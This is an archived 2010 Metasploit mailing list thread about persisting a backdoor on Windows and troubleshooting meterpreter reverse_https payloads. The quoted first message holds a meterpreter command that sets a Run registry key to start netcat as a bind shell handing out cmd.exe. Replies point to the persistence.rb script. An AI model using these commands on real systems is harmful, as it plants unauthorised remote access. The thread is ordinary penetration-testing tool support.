Metasploit mailing list archives

Re: Persistent Backdoor


From: Miguel Rios <miguelrios35 () yahoo com>
Date: Sun, 10 Oct 2010 07:52:04 -0700 (PDT)

Hi,

Yeah I noticed the same behavior with reverse_https lately, which is why I'm using reverse_tcp for now. Reverse_https 
used to work very well but now I also get the timeout issue after it starts sending the initial stage. Sorry I can't 
really help. I can only confirm I'm getting the same issue with that payload, independently of whether it's persistent or not.

cheers

--- On Sat, 10/9/10, Tom Van de Wiele <tom.vandewiele () gmail com> wrote:

From: Tom Van de Wiele <tom.vandewiele () gmail com>
Subject: Re: [framework] Persistent Backdoor
To: "framework" <framework () spool metasploit com>
Date: Saturday, October 9, 2010, 9:09 PM

Hi,
Sort of dropping into this thread, my apologies. Persistence.rb is really recommended instead of setting regkeys 
individually. Unless the victim has checks for the regkeys set by persistence.rb of course. I have a little issue with 
it, in that it runs great with e.g. a windows/meterpreter/reverse_tcp payload, but has anyone experienced problems with 
running it with a windows/meterpreter/reverse_https payload? I'm doing a file format client directed attack with 
another box as an exploit/multi/handler and on that box I see the reverse connection coming in from the victim to my 
multi/handler. I see a TCP handshake being performed but then no data being sent by the victim, after which the 
connection times out. I'm using reverse_https with 443/tcp as the client connecting back has to traverse a proxy 
server. I have tried this in another test lab with no proxy server in between (2 machines sitting in the same LAN) but I 
get the same behavior. Using ruby1.9.1 and build svn r10585 from 2 days ago.


Thank you for sharing your experiences or any pointers on how I can diagnose this further.


On Mon, Oct 4, 2010 at 3:40 PM, David Kennedy <kennedyd013 () gmail com> wrote:


Why not use run persistence from meterpreter?
On Oct 4, 2010 9:36 AM, "Eric" <dkn4a1 () gmail com> wrote:
Hi,

meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\windows\system32\nc.exe -Ldp 455 -e cmd.exe"
nor
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d "C:\\windows\\system32\\nc.exe -Ldp 455 -e cmd.exe"

doesn't seem to work for me :-(
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
